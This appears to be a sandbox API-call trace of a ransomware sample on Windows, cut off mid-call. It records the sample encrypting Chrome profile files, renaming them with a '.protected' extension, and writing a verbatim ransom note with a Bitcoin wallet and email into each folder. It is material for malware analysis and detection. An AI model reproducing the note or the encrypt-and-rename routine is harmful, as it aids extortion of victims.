102 [0084.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\origintrials\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.474] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.474] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.475] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.475] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.475] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.475] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.476] CloseHandle (hObject=0x150) returned 1 [0084.476] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="Windows") returned -1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="Program Files") returned -1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="Program Files (x86)") returned -1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="$Recycle.bin") returned 1 [0084.476] lstrcmpiW (lpString1="PepperFlash", lpString2="System Volume Information") returned -1 [0084.476] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned 83 [0084.476] lstrcmpW (lpString1="PepperFlash", lpString2=".") returned 1 [0084.476] lstrcmpW (lpString1="PepperFlash", lpString2="..") returned 1 [0084.476] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*") returned 85 [0084.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.477] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\.") returned 85 [0084.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.477] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.477] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\..") returned 86 [0084.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.477] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.477] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.477] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\RESTORE_FILES.txt") returned 101 [0084.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\pepperflash\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.477] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.477] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.479] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.479] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.480] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.480] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.480] CloseHandle (hObject=0x150) returned 1 [0084.480] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="Windows") returned -1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="Program Files") returned -1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="Program Files (x86)") returned -1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="$Recycle.bin") returned 1 [0084.480] lstrcmpiW (lpString1="pnacl", lpString2="System Volume Information") returned -1 [0084.480] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned 77 [0084.480] lstrcmpW (lpString1="pnacl", lpString2=".") returned 1 [0084.480] lstrcmpW (lpString1="pnacl", lpString2="..") returned 1 [0084.480] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*") returned 79 [0084.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.480] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.480] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.480] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.480] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.480] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.480] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\.") returned 79 [0084.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.480] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.481] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.481] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.481] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\..") returned 80 [0084.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.481] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.481] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.481] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\RESTORE_FILES.txt") returned 95 [0084.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\pnacl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.481] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.481] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.482] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.482] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.482] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.482] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.483] CloseHandle (hObject=0x150) returned 1 [0084.483] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="Windows") returned -1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="Program Files") returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="Program Files (x86)") returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="$Recycle.bin") returned 1 [0084.483] lstrcmpiW (lpString1="Safe Browsing Channel IDs", lpString2="System Volume Information") returned -1 [0084.483] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.483] StrStrIW (lpFirst="Safe Browsing Channel IDs", lpSrch=".protected") returned 0x0 [0084.483] lstrcmpW (lpString1="Safe Browsing Channel IDs", lpString2="RESTORE_FILES.txt") returned 1 [0084.483] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.483] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.483] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.484] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".txt") returned 0x0 [0084.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.484] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".rar") returned 0x0 [0084.484] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned 97 [0084.484] StrStrW (lpFirst="Safe Browsing Channel IDs", lpSrch=".zip") returned 0x0 [0084.484] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.493] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1400, lpOverlapped=0x0) returned 1 [0084.493] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.493] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.493] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.493] CloseHandle (hObject=0x150) returned 1 [0084.493] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.protected") returned 107 [0084.493] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids.protected")) returned 1 [0084.494] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="Windows") returned -1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="Program Files") returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="Program Files (x86)") returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="$Recycle.bin") returned 1 [0084.494] lstrcmpiW (lpString1="Safe Browsing Channel IDs-journal", lpString2="System Volume Information") returned -1 [0084.494] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.494] StrStrIW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".protected") returned 0x0 [0084.494] lstrcmpW (lpString1="Safe Browsing Channel IDs-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.494] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.495] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".txt") returned 0x0 [0084.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.495] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".rar") returned 0x0 [0084.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.495] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".zip") returned 0x0 [0084.495] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.495] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.495] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.495] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.495] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.496] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.496] CloseHandle (hObject=0x150) returned 1 [0084.496] wnsprintfW (in: 